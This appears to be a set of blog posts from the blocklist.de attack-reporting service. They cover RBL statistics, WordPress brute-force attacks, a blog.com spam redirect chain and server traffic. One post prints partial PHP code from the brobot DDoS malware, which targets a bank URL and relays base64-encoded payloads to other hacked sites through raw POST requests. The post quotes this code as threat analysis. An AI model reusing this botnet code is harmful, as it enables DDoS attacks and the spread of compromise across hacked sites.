Fail2Ban Reporting Service

Currently we have 3 RBLDNS-Server which have the Attacker-IPs listen from the last 48 Hours after the last Attack in some Categories:
http://www.blocklist.de/en/rbldns.html

On the usa-Server we have active the rbldns-Stats. The rbldns generate the Count of Queries, Count of Matches and the Bytes which have received and send.
The RBL-Server gets each 10 Minutes a summery of:
19 M Queries
1 M matches
The value varies on the Weekend and Attack-Runs.

Also the RBL-Servers returns in the TXT-Record the Service-Name like “ssh” and the Unixtimestamp of last reported Attack:
Infected System (Service: apacheddos, Last-Attack: 1370990468), see http://www.blocklist.de/en/view.html?ip=$ip
In time to time, there was over 20.000 IPs in the complete List listen.

The Brute-Force Login Attack on WordPress and Joomla run since a few weeks:

http://support.hostgator.com/articles/specialized-help/technical/wordpress/wordpress-login-brute-force-attack

We have currently listen 16582 IP-Address on the bruteforcelogin-List

In the last Days, the Attackers use in the most Requests (think over 90%) the UserAgent “Firefox/19.0″:

189.143.62.117 - - [06/Jun/2013:17:51:46 +0200] "POST wp-login.php HTTP/1.0" 200 4555 "http://referer-domain.tld/" "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0"

We have found on one Site a little bit Malware-Code, but there was not complete. If you received a Report from us and found the Malware-Script, please send them to us.

Thank you!

After the last “URL-Reporting” there was used most *.pl Domains, but now we have found over 9,181 URLs from *.blog.com which was abused by SEO-Spamer to get Traffic by good sites over blog.com to there “Money-Sites”.

On there Moneysites, he offer to make money over clickbank with Affiliates.

Other blog.com URLs, but with the same content or a little bit different content, but all redirects to clickbank.com:

Some Links go to the “Money-Site” of the SEO-Spamer over tinyurl.com: “hxxp://tinyurl.com/cszvyuf/go8.php?aHR0cDovL2p1bDRvbm9rODUuZWJheWNlcnQuaG9wLmNsaWNrYmFuay5uZXQ=”

And then to: “http://www.jobreplacementformula.com/clickbank.php?hop=codelocker” or direct to clickbank.com

And on there, all Links goes to hxxp://www.lottomasterformula.com like this:

hxxp://www.lottomasterformula.com/dlguard/dlg/sell.php?prodData=cb%2C6

and then to clickbank.com:

hxxps://ssl.clickbank.net/order/orderform.html?time=1370165174&vvvv=6562617963657274&item=1&detail=Job+Replacement+Formula+67&vvar=detail%3DJob+Replacement+Formula+67%26dlgp%3D6&oaref=01.09B9DCCD9E0E71A5790AC3235281919F0D991A7DEB89597DD4E6AA7D1731DA971A6BC929777E2ED95D5AF51F83B0AA90A0AF6050AB48256725481747D07F78E1ECBF3B2FC242EF671C76543A63F84442719A7B93

From there, you have an order-formular to buy the Book how can you make many with clickbank.com for only “$67.00″:

On the bottom there is a Text from a Banner with “codelocker.blogcom” which was not replaced from a JavaScript in the Chrome-Browser under the VirtualMachine:

We have report the URLs over the Ticket-System to blog.com and wait for an response. At this time, i don’t think, that blog.com uses clickbank.com to make adds on there site….

In the most case of sites with user generated content, the urls will be disabled/deleted.

Currently we have over 2,677,883 URLs in our Database which was posted by Spamer in our Honeypot-Systems. We look in the next time how many new urls come daily into and add a rbl-List with these URLS.

Have interests on this URLs, please contact us.

We have insert in the TXT-Record of the RBLDNS now the unix Timestamp of the last Attack which we received.
We listen IPs 48 Hours along in our Lists, but dynamically Addresses will be changed from some Provider after 12 Hours.
Now you can see when blocklist.de received the last Attack from the queried IP.

For example for the IP 186.241.250.183:
#dig 183.250.241.186.apache.bl.blocklist.de TXT

;; ANSWER SECTION:
183.250.241.186.apache.bl.blocklist.de. 2467 IN TXT "Infected System (Service: apacheddos, Last-Attack: 1369828413), see http://www.blocklist.de/en/view.html?ip=186.241.250.183"


You can parse between Last-Attack: and ), the Unix Timestamp.

A other way was to add the age of last Attack in the A-Record in Hours like this:
127.0.0.x for last Attack was under one Hour old
127.0.2.x the last Attack was older between 2 hours

Please wrote into the comments about the second Way to inser the age in the A-Record.

Currently, blocklist.de has the following Stats/User:

User: 853

Server: 1015

Attacks: 290,425,621

Reports: 4,546,850

Daily Mails: ~170100 (lower limit) ~360000 (high limit)

Web-Traffic: ~220 GB

RBL-/API-Traffic: ~70 GB

Mail (In/Out)-Traffic: ~~2130 GB In 04/2013 we use now the local IPs, so the Traffic between the Reporting-Server was not longer included and the Traffic is going down

Traffic over IPv6 (Mail, Web..): ~6GB

To this data, there comes 2,1TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~3,8 GB each Hour out.

The Mysql-Server use now 40% from 32GB Ram. And the System-Load is in average on 1.00 .

The WebServer is using not full of 13GB Ram and the System-Load is under 0,7. The open Connections are ~2000

The complete Traffic from all Systems are round about 4,2TB in March 2013.

Since 2013-04-02 T18:05 UTC, the brobot starts Attacks against the US Banks again.

He send now the following Code and execute them:

Here is one of the complete Code (he has different Codes) (new lines insert by us, to read it better):


function randomvar(){
$a=chr(rand(97,122));
$b=rtrim(base64_encode(rand(100,10000)),'=');
return $a.$b;
}
$url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
$rand = md5(microtime().rand(0,500));
if(preg_match("/\?/",$url))
$url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
else
$url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
if(!function_exists('scandir'))
{
function scandir($a,$b=false,$c=true)
{
$d=array();
if($e=opendir($a))
{
while(false!==($f=readdir($e)))
{
if(($f!="."&&$f!="..")||$c==true)
{
if($b==false)
if(is_dir($f))
continue;
array_push($d,basename($f));
}
}
closedir($e);
}
return $d;
}
}

function tgya8siudj()
{
if(@is_writable('/tmp'))
return '/tmp';
elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
elseif(!function_exists("sys_gt_temp_dir"))
{
if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
return realpath($_ENV["TMP"]);
elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
return realpath($_ENV["TMPDIR"]);
elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
return realpath($_ENV["TEMP"]);
else
{
$a=gyhuijoakosdoj();
if($a==!false)
return $a;
$p=tempnam(md5(uniqid(rand(),TRUE)),"");
if($p)
{
$q=realpath(dirname($p));
@unlink($p);
return $q;
}
else
return false;
}
}
else
return sys_get_temp_dir();
}
exit;

complete Code formated

He has now here own “scan_dir” function, when the Function not exists or is disabled.
And he looks now to execute the ddos over exec with wget or proc_open and other functions, but not longer with fsocketopen or stream….
Are two many systems without socket support?
Update:Here is acode with socket

The Hackers have write a new Phase for “Phase3/W5 Operation Ababil”

In the last Days, the BroBot Runners runs a new Wave with and send POST-Requests with c_id to the hacked Sites.

The Data (base64_encoded) has the following Skript/Data:

The Script calls in each Post-Request 140 to 180 others hacked URLs:


....
function send($target){
forkill();
if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
global $code;
}    else{
$code = $_REQUEST["c_id"];
}
if(!preg_match("/http/i",$target))
$target = "http://$target";
$parts = @parse_url($target);
$host = $parts["host"];
$path = $parts["path"];
if($path=="")$path="/";
$data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
$request = "POST $path HTTP/1.1\r\n"
."Host: $host\r\n"
."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
."Accept: */*\r\n"
."Accept-Language: en-us,en;q=0.5\r\n"
."Accept-Encoding: deflate\r\n"
."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
."Content-type: application/x-www-form-urlencoded\r\n"
."Content-Length: ".strlen($data)."\r\n"
."Connection: Close\r\n"
."Cache-Control: no-cache\r\n\r\n{$data}";
forkill();
$fp = @fsockopen($host, 80);
@stream_set_timeout($fp, 3000);
@fwrite($fp, $request);
@stream_set_blocking($fp, 0);
return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
@unlink(writabledir()."/res"."2ebx839d1fb28e");
flush();
}
$fn = lock();
....

 

We have found currently 3357 URLs with hacked Joomlas/Sites.

Over 2.500 Script/URLs are online. In the next days, we look to report the Site to Bank of America or directly to the Hoster to check and fix the site.

We will analysed in the next Days the complete PHP-Code and write a little bit what is not good and can be make better

If you want to get the complete code, please contact us.

We have currently the following Servers with the following Timezones (Location):

Count Timezone (Order by Count, desc):

Count Timezone (Order by Timezone asc):

Old Servers which have no Location/Timezone or never send Reports from Service which has no Timezone in the Logs, was not listed here.

The Statistic for February was a little bit false, because in the Stats was listen the internal Traffic between the MX- and Reporting-Server from the same Datacenter.
In the Statistic from 03/2013 and after, the internal Traffic is not longer listen.

Currently, blocklist.de has the following Stats/User:

User: 800

Server: 955

Attacks: 266,788,236

Reports: 4,354,768

Daily Mails: ~200100 (lower limit) ~450000 (high limit)

Web-Traffic: ~200 GB

RBL-/API-Traffic: ~60 GB

Mail (In/Out)-Traffic: ~~2600 GB (But there was included the internall traffic) In 03/2013 we use now the local IPs, so the Traffic between the Reporting-Server was not longer included and the Traffic is going down

Traffic over IPv6 (Mail, Web..): ~3GB

To this data, there comes 2,5TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~5,2 GB each Hour out.

The Mysql-Server use now 50% from 32GB Ram. And the System-Load is in average on 1.20 .

The WebServer is using not full of 12GB Ram and the System-Load is under 0,7. The open Connections are ~4000

The complete Traffic from all Systems are round about 3,9TB in February 2013.
Only about ~1,9 TB without the internal Traffic between the MX- and Reporting-Servers.

Currently, blocklist.de has the following Stats/User:

User: 738

Server: 882

Attacks: 187,080,505

Reports: 4,139,547

Daily Mails: ~400100

Web-Traffic: ~60 GB

RBL-/API-Traffic: ~80 GB (all Mirrors)

Mail (In/Out)-Traffic: ~~900 GB

Traffic over IPv6 (Mail, Web..): ~3GB

To this data, there comes 3TB Traffic between the Web-/Mail-Server and the MySQL-Server. The MySQL-Server sends over ~4,7 GB each Hour out.

The Mysql-Server use now 40% from 32GB Ram. And the System-Load is in average on 0.80 .

The WebServer is using not full of 9GB Ram and the System-Load is under 1 (thanks nginx). The open Connections are ~7000

The cpmplete Traffic from all Systems are round about 1,5TB in January 2013.